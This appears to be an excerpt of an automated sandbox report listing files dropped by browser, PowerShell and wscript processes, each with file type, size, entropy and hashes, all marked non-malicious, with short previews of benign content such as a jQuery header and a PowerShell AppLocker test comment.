                                                                                                                                                                            SSDEEP:96:CSGH/f6BMBxJkgJKG35Q9e2OcUYIlU6DIyLs5:CSanpBxJveacU7i6cL
                                                                                                                                                                            MD5:CB1B7ACCCEB7DAAA53695BE7E92262BD
                                                                                                                                                                            SHA1:FBAB831544E0B16FC53E326F98C14CE48556FB2E
                                                                                                                                                                            SHA-256:420271E503C1283EF18058A3132C738F8D5F93F4A3171CBB6258671806E1ED04
                                                                                                                                                                            SHA-512:732CE095832573D566C4EF5F81D7A63F888229E7ECE9FC04408D2551111483DD3A7CCD81B71C2C0AB760B97D5EEE9289C850E908E4700D3131EB0DEFDF13AA23
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:PNG image data, 96 x 96, 8-bit/color RGB, non-interlaced
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):6424
                                                                                                                                                                            Entropy (8bit):7.933023434267246
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:96:Q3llcHitlIxv9vk7C1+I4wWHLihk/xZS+I+saEEmg5m5wcJCQ01wE9zGQ5pHPSRp:Q8IIHUCD4wa3S+I+s8p5FLyEtrO
                                                                                                                                                                            MD5:B701282FC44DFC7BD54898C26C213FC5
                                                                                                                                                                            SHA1:828590230FC163563ABFC3EE2677E36AEA16C26E
                                                                                                                                                                            SHA-256:8859F4FEF9E74D2B1001256F86BDF48AA307BFC4D809663BA853507AA881689F
                                                                                                                                                                            SHA-512:2C25B200E685C1D86A27620FF241DA27781AB290D3B2F0E46D5E4D412041EDF9416662320ECDDBCE0EA727882D6BFB359AA04DC14CCDC83DF0AA578D3953C23B
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):18737
                                                                                                                                                                            Entropy (8bit):3.2062466761310993
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:96:bSDZ/I09Da01l+gmkyTt6Hk8nTKkEWmIKJHxNXrNXNsc5MVNzhpA:bSDS0tKg9E05TKk6L5gpA
                                                                                                                                                                            MD5:23961A289D57B15CE78E725C8DB95124
                                                                                                                                                                            SHA1:AD22B0DF2C88DCF74C75618042809EC228660100
                                                                                                                                                                            SHA-256:0B428DC30D2F11B851BB4790799644079FD5102F760496BCEE1DDD5447B3233E
                                                                                                                                                                            SHA-512:D90984851193DA69AEF3FFA6F5F2710D230533205A190619A47F006EE9D6CE92085B0E04C23BED04269057B3620B3CA732679A1EE4F1134B6C60C7498672CC53
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):149741
                                                                                                                                                                            Entropy (8bit):5.369311179888439
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:1536:Hz55ZowUSwJUDwK2O7YZ7CV72aXflUgxuZ2BYLgwmjrXwRb1zOGYXJXzC00mJewh:tLoHSsyHw76lUa3KYjkjOGQC00MRuK5f
                                                                                                                                                                            MD5:BB3B39AE9D534552B5B772A8A966E240
                                                                                                                                                                            SHA1:C265C88D6F14BE5F3B1A54F54B61A4DCEE2FCE6F
                                                                                                                                                                            SHA-256:265195B99C4B69FC6E4DF429351B0A60C838F033C182CD46E4BD3689EE67E342
                                                                                                                                                                            SHA-512:A06ABD69276BD303524B905BD39FEC7E2562178F47377B0FC95F5755435436592B1C596981276E2FBEB6A77439A68475A7C066875CAB5D73B954107A18B6D81E
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:PNG image data, 1633 x 708, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):27928
                                                                                                                                                                            Entropy (8bit):7.701164569435742
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:768:xSufGKAfaoovahBv4apFM4lvzDpqFosGd+Up9FIK0B:jfUMve54E//fCiIK0B
                                                                                                                                                                            MD5:862D29153222B9B15C3C73B61B930335
                                                                                                                                                                            SHA1:391BEBF4BA8910B718C5516491EB1C7D32D4C187
                                                                                                                                                                            SHA-256:3EC8FA41DCE2684102F4A7B2D993388809CC2F6AE0616807CA9E3D94E6D19AC2
                                                                                                                                                                            SHA-512:6FFCB08DE27DFA571C8EF35E7F017F2871482581308C10CF38EFF9A507D02325222B899D667FC86227C2985ACA05F17C1CD33EF4163BE3442F70F8907BD78404
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:PNG image data, 375 x 180, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):23972
                                                                                                                                                                            Entropy (8bit):7.983082688064765
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:384:OQCmhN3Hqqm87sSOvS8PJKCqedNV7TMzNjdpNQsjtHnUSQkBmSfYuoq9Dgt:dCmr3KqmIdO68MAnnWNjdpBSSQVfWDgt
                                                                                                                                                                            MD5:64C4757048F068394817EE126FDBA8A6
                                                                                                                                                                            SHA1:3610DC2EB5E3C09809E94BD0694A06C7A51580FF
                                                                                                                                                                            SHA-256:A9FEC8F56726ECA81D0600220A6B168FFF112A5283741FD5EC63509AEDBB51D5
                                                                                                                                                                            SHA-512:373EE45E16D231B2FF8A897A357A52A58B63430E0BCF728867879F2E10E55C631589D6F63C1675E2E40EB1EF7CEB59B15DF18013EA0F3FA352A3B36296F14DAB
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x157, components 3
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):10059
                                                                                                                                                                            Entropy (8bit):7.913212329308868
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:S70+nvdHCvRujNuKWUxG/moExYmstk/xJLfh3GNVEfLwM2jy:SZnvdHzuKW04m8k/xJLJ3GPqcjy
                                                                                                                                                                            MD5:C240C74EE03905C7790DFD4EB11DE84F
                                                                                                                                                                            SHA1:01C1D8B86485AB8267B0DB03E45437EA551FC288
                                                                                                                                                                            SHA-256:2706C0AF76B6CBC23245B640AA4ABA2ADB4D1D52BDB413D16A22C64756A5E450
                                                                                                                                                                            SHA-512:CBC2081183C2D1EDB15732BF1DA6B1CE119524D7E65FE08912B10D738BC558A00C435F29922CBF7CD2E348C0B31B7C001249F29A6A30A51CD2F0A2FB0CA1E703
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 620x304, components 3
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):37612
                                                                                                                                                                            Entropy (8bit):7.967758474856965
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:768:Rmjub4sUz5q/KEqAGpxQgUsFSKK+erPU9sNHwSUyFELh4JMiJFhze:RmjussTHYQgUeSKKZ7UOrEN4JrJFhi
                                                                                                                                                                            MD5:4A48AD85B38D49D9BCF1C1F7FF6DB8D8
                                                                                                                                                                            SHA1:1B8E3D13A9EA9BABABC6153211CE1A4D2D5FBE13
                                                                                                                                                                            SHA-256:0F76C328F2309A72325522B405C00761D6BE5740CC3D3E885CA11D20D0336EEC
                                                                                                                                                                            SHA-512:663C6A6ECBE875418C05232968DDBAEA8A8C1F11DD3023277798B8F464305F4B6BA235A70043C68904AEC44AE997C4E3608B0735E7B9533B0E6C663D113695F1
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x157, components 3
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):9820
                                                                                                                                                                            Entropy (8bit):7.923748616593692
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:StdN3ccQqHawH703vdlA92LZRjz5KOZU0YmsLtpUPfxbke:StdChUawH703vdlA9oH35KO+msLHURge
                                                                                                                                                                            MD5:CE824D352B40636D772865A22A5CC64A
                                                                                                                                                                            SHA1:EBDFD44EF7E583462CC7974A7E47351D18FAA0DC
                                                                                                                                                                            SHA-256:5F2B909F010BE7CFF14CE68F19E7031794DE0DE3F533B2168BC2D5DD794D6732
                                                                                                                                                                            SHA-512:509950EA42666EA4302233ABE2857CC9E50602DAAB421615DE986284FBEAE8375E50D1CA89CE6759BE405BCE24F6EBBFA9F4C8D4CEFCC8DE93DB79C328A3D266
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (57498), with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):194095
                                                                                                                                                                            Entropy (8bit):5.452846000918709
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3072:YpeydBFOGFxiq6C8khsNyh/P9OZ8TixY3:YpeyAGFxx6C8hNyhX91OxY3
                                                                                                                                                                            MD5:64191DEBC4F7F9F77445F9BFB005006B
                                                                                                                                                                            SHA1:57D328AF982F847B2DCBE8902A3A03B1F5AEE0AF
                                                                                                                                                                            SHA-256:87D84C1F7A8E89B4733732558702C617AC4A16982A6D06AE5A92C54B6021E8BA
                                                                                                                                                                            SHA-512:8B9F4EB45B16C79E7760555946D0B732AB67042CF2E395822F7001B1DFA397B97C63304FD97A6855F5A4E8DB20030C89F35E81A852C5F1636089DF4443B4300C
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:PNG image data, 96 x 96, 8-bit/color RGB, non-interlaced
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):25586
                                                                                                                                                                            Entropy (8bit):4.841709251634318
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:Q2SDS0tKg9E05TFkUEV75tfFf6EE6Z8bPaCye1LeauzLFvHC4u:CJXE05CUEV75tfh6Eda2aGFvHru
                                                                                                                                                                            MD5:04E8885641EF28A35DA589367E0E3082
                                                                                                                                                                            SHA1:2D76CAB90E7287B6B793808B0B221A04F365980A
                                                                                                                                                                            SHA-256:EADC212773B7A6EDD895513E436ACDE740DBF98EE77E3F4F07E960CBE4881FA1
                                                                                                                                                                            SHA-512:BC4872233D27E1E3B3E755B18DA0BE92E3259ED46E1373DCE1C8E3CE46E2BC6AB7AF2391662E50EC648A995112F1EE021CB201CF4077EA11BD30B1227F504DEE
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:PNG image data, 96 x 96, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):3532
                                                                                                                                                                            Entropy (8bit):7.898834558255451
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:C/6rD86PqmSUC2jKD/YDIkYCsPC7eKckLHvis8aVyt51nl648svBInwA9NunIbQx:CSrXzC7jY7l+U/ckLPiaG79vQMXYRLu
                                                                                                                                                                            MD5:47D01EE8DA7EF964B63B713A8562EB5F
                                                                                                                                                                            SHA1:742B956BD1BFEC102353CBE7050A99B8046A1A50
                                                                                                                                                                            SHA-256:FCCB19F39DD8A2AB0B87B212A020B5B61CCC954505DC8DF3799D9779382F0E4F
                                                                                                                                                                            SHA-512:BDBB9A109E4E39B885A40F91A5E2183443036B4B84B014F6A857645FA622DCA3A59C3B5B4BE100174E609216E795D5E01E4F04FD83BE490648571AF8358589F0
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):4740
                                                                                                                                                                            Entropy (8bit):5.320014461091607
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:YYP1ro/cBKXF5oZhVcFI6u6Q+w2xiVKIqHuqJ9J1IniVKIqHuqKXFf7B1Z7VxIqz:r0cBCMOBvJ2nisCFEE0t5WQirtEm
                                                                                                                                                                            MD5:6758C52F837D81262794C8F4085C2DE8
                                                                                                                                                                            SHA1:E04B9878D84532740B0F6A6CD88BB4B4C49C74D1
                                                                                                                                                                            SHA-256:E3C953933AD86C8DEB2903D9E5398EDA4C464F702DE504A8E6E8D69C88D6A579
                                                                                                                                                                            SHA-512:EC119FB6386C4544566A5F6F8876EDC55E57EE253C460BE72413922110C698BC404302EEA668AEDF23D00F1B50D01D7E33968BC415322A57C5994E303F09B0DE
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"$type":"list","title":"","_isPublishingLocked":false,"_id":"BBI4MeJ","_name":"MGXStoreWebPromo (old Backfill list - DO NOT DELETE)","_sourceMetering":{"isMetered":false},"_lastEditedDateTime":"2024-12-10T20:39:35Z","_links":{"self":[{"href":"cms/api/amp/list/BBI4MeJ"}],"parent":[{"href":"cms/api/amp/section/BBREXz4"}],"children":[],"feed":[],"provider":[],"references":[{"href":"cms/api/amp/image/AA1pt3D8"},{"href":"cms/api/amp/image/AA1pt11O"},{"href":"cms/api/amp/image/AA1vcIGr"},{"href":"cms/api/amp/image/AA1q4Ts4"},{"href":"cms/api/amp/image/AA1vlKur"},{"href":"cms/api/amp/image/AA1v7B4b"},{"href":"cms/api/amp/image/AA1rtsRJ"},{"href":"cms/api/amp/image/AA1uj2IY"}],"section":[]},"tagEvaluationGroups":{"_tagsHash":"3145739","tags":[],"vectors":[]},"_locale":"en-us","sourceId":"BBlbsHE","keywords":[],"facets":[],"labels":{"category":[]},"list":[{"link":{"href":"https://www.lendingtree.com/?splitterid=home-equity&cproduct=homeequity&cchannel=content&csource=tradingdesk&esourceid=6475
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:PNG image data, 60 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):533
                                                                                                                                                                            Entropy (8bit):7.415663553371965
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:6v/7Ya7/6Ts/o7hJW8/t8oX8qUkUGGVIXC/zoZ3VYZwWSVR:E/6pzWK+q/UGGMC/zw3oGVR
                                                                                                                                                                            MD5:B6162D100379E7F4EF709BA5C26D1BA8
                                                                                                                                                                            SHA1:AEA4244C56F00AA26064134863157A6EE9D7ABB9
                                                                                                                                                                            SHA-256:DCA74022BEBB4F12F8EFADD226C9413CAFFF9193420D604DE8A398642172AACA
                                                                                                                                                                            SHA-512:CC64207C45F85255F34A157C9370A46EBD4A2B3A674E639838EF7582FD93D68F91A275C577E2FC9A46674EC765D8CC43A5BE28B281FCD5006D38D0C6F02E2058
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:PNG image data, 7 x 13, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):197
                                                                                                                                                                            Entropy (8bit):5.986656121330302
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:yionv//thPlyyta2/uDlhlp8Lts7CX9/2yx24lSXqU3hjg/BFCb0cCHxlbVdMaW9:6v/lhP1b/6TsR/R0Zjgz89CXVdMndp
                                                                                                                                                                            MD5:34760615AB0C180EB4B48739297FD0F2
                                                                                                                                                                            SHA1:789438D09CC27A08879B1A9686C82527270E7C24
                                                                                                                                                                            SHA-256:360C33D59E7358579601909D4CE91F1BCABF9E07BEB8F69D50C226D7D8F91260
                                                                                                                                                                            SHA-512:1CE7E574D45D123C6B52119907E74D71B842F1CC380D79AEF876FDBC9FDB663F385BB4191650813D2E66EFE24265FD36EC944AF95F372C0413EDCF11361CA666
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):4286
                                                                                                                                                                            Entropy (8bit):5.912342955561912
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:96:YY2q7UYWIzFhJFYo6syPYmSTZYVVQQT/VfygN6:YYh7TWqFpzTTGjT/VfyZ
                                                                                                                                                                            MD5:A73B8189E32D3A97AE2FBF1A57931D49
                                                                                                                                                                            SHA1:560A8EA628A89A82233BF4288166B54789242966
                                                                                                                                                                            SHA-256:855F6B5EEA22A22F5F4ABCCEEED4B8969EFB3A99443036EB5EB64F5F46C8FD8E
                                                                                                                                                                            SHA-512:2B016E28A7E63DE8FCAD90DDB38CCD5D875A22CF53D723E055B7C7C9B7589CB818883234C6682CA25112AF3CB4BA61A1AED384C1638C04905FC6FAFDD37F79A4
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:ASCII text, with very long lines (65447)
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):89947
                                                                                                                                                                            Entropy (8bit):5.290839266829335
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:1536:ENjxXU9rnxD9o5EZxkMVC6YLtg7HtDuU3zh8cmnPMEgWzJvBQUmkm4M5gPtcNRQK:EcqmCU3zhINzfmR4lb3e34UQ47GKL
                                                                                                                                                                            MD5:CF2FBBF84281D9ECBFFB4993203D543B
                                                                                                                                                                            SHA1:832A6A4E86DAF38B1975D705C5DE5D9E5F5844BC
                                                                                                                                                                            SHA-256:A6F3F0FAEA4B3D48E03176341BEF0ED3151FFBF226D4C6635F1C6039C0500575
                                                                                                                                                                            SHA-512:493A1FE319B5C2091F9BB85E5AA149567E7C1E6DC4B52DF55C569A81A6BC54C45E097024427259FA3132F0F082FE24F5F1D172F7959C131347153A8BCA9EF679
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:/*! jQuery v3.6.3 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,y=n.hasOwnProperty,a=y.toString,l=a.call(Object),v={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},S=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||S).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x157, components 3
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):20069
                                                                                                                                                                            Entropy (8bit):7.958380896037087
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:384:S9Od2BaVN690B/DHhnbk+bDApttq3o54wLShRxn9K7tyYnWVMSX4UsYBKcH7oMdK:SQd2BUmGD1Q+fAptM3DwkRxkVWV40lHS
                                                                                                                                                                            MD5:BBBCECCD508AAD0B35F44C261B6A2608
                                                                                                                                                                            SHA1:1A70962A9B5D039843BF20376778B149E1EB1987
                                                                                                                                                                            SHA-256:919EF365314D75F04CF1BBE006517E2970432F5CD97844ECEA1E1B4DBD4CF3B6
                                                                                                                                                                            SHA-512:EE3CB283962814266B5CF7A20E247AB5679C3F592EE9F078C5AEA5E0F492594F3D70F0FA9C5D10A6B0B46825E78B25BA642D1B635EDF48CF6C4693A3AAC56A43
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x157, components 3
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):19306
                                                                                                                                                                            Entropy (8bit):7.957627780954709
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:384:StDgdb+HfghcO0srx/e6tVp4/XxGFZe8Z+Jl7I5pA86KRHjHbr:Stcdb+/1OJ/Ry88r78pAxUDH3
                                                                                                                                                                            MD5:24F6C4A5746511D2AAD3CAD795C620C2
                                                                                                                                                                            SHA1:1C23EF8986889559C587A6FD306BC5724494C7B2
                                                                                                                                                                            SHA-256:0CF65C36E5BE8713EC17C721ADD5A4514B37290E066C20B5B50D3234665F94CB
                                                                                                                                                                            SHA-512:DE2759744A33D4F1165625291C36B760CABA847FD960295F85E79857D20F05C965E9B95A8224B73F38E781989377677546DD21C21B8B92C18369585116FECC02
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x157, components 3
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):19051
                                                                                                                                                                            Entropy (8bit):7.965999992554655
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:384:S/9HOKNl9dW443vkpnYPBktRjso10TMKRYG9muG5MglR:SFr5MMxrRjxKQKRYqbbglR
                                                                                                                                                                            MD5:178E525918C8BFFD4F031CDC399FC916
                                                                                                                                                                            SHA1:21B128318AA6689BB013CD90F640252AB1D8F85E
                                                                                                                                                                            SHA-256:67C8A9650AB5261B9CC99247624996931DFB45D503BA8BAFD75F7707AD484981
                                                                                                                                                                            SHA-512:D9B880403251CD1EC3840939012E1A8781144C8DBB19D1AA8D4DA5FBF69C888126FC2B3BDA5349430B3BDC5BEA3AFD24B4C7392CA704719D8351AFC215F3D04B
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):64
                                                                                                                                                                            Entropy (8bit):1.1940658735648508
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:Nlllul3nqth:NllUa
                                                                                                                                                                            MD5:851531B4FD612B0BC7891B3F401A478F
                                                                                                                                                                            SHA1:483F0D1E71FB0F6EFF159AA96CC82422CF605FB3
                                                                                                                                                                            SHA-256:383511F73A5CE9C50CD95B6321EFA51A8C6F18192BEEBBD532D4934E3BC1071F
                                                                                                                                                                            SHA-512:A22D105E9F63872406FD271EF0A545BD76974C2674AEFF1B3256BCAC3C2128B9B8AA86B993A53BF87DBAC12ED8F00DCCAFD76E8BA431315B7953656A4CB4E931
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 9, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 9
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):196608
                                                                                                                                                                            Entropy (8bit):1.1220878973775341
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:384:KdM2qOB1nxCkTSAELyKOMq+8yC8F/YfU5m+OlT:Kvq+n0I9ELyKOMq+8y9/Ow
                                                                                                                                                                            MD5:609B497EE21C071513ED99128FD7BBA5
                                                                                                                                                                            SHA1:A6C6FCD5CF1EC5D9584335BE994ABADC2FA6705D
                                                                                                                                                                            SHA-256:8B1566190776285A27BFA5342B1BD0CF0DD4C0B80FD6DF30892A5519E20AA647
                                                                                                                                                                            SHA-512:C0EBE69DC37944F482A736DB622432DBC3C37464B85AE5881AB61570E81381E6C0A1210BA0EB0D2D2482145BF5FD479C47FA21DDC6CC4E88753438FD43326846
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1
                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:L:L
                                                                                                                                                                            MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                            SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                            SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                            SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:.
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 276634
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):242356
                                                                                                                                                                            Entropy (8bit):7.991210403664034
                                                                                                                                                                            Encrypted:true
                                                                                                                                                                            SSDEEP:6144:nvRDe2ei//LiBCNBs4vIVeMRhzb6d0X7ayNC:nde2edcbveZRFW0X2yk
                                                                                                                                                                            MD5:B73A9C52EF76DD9F575BDCF919B05902
                                                                                                                                                                            SHA1:A7ED2E7B5F85D6E502B538FDEBD91343D811E55A
                                                                                                                                                                            SHA-256:EF05EE3FA07D46FDDD88DA7760509F7BA658D3A9A5696004404F5A128349B323
                                                                                                                                                                            SHA-512:01EB2E462F3EDE544A66C0EEABA9172B668B6EA20D2FEF5A3DD2217E60ED42F70523F194B8901A48CDA3E55E1F65A14BAB2FBE3B34D2CB410B1939B9BB7B4CBC
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1
                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:L:L
                                                                                                                                                                            MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                            SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                            SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                            SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:.
                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
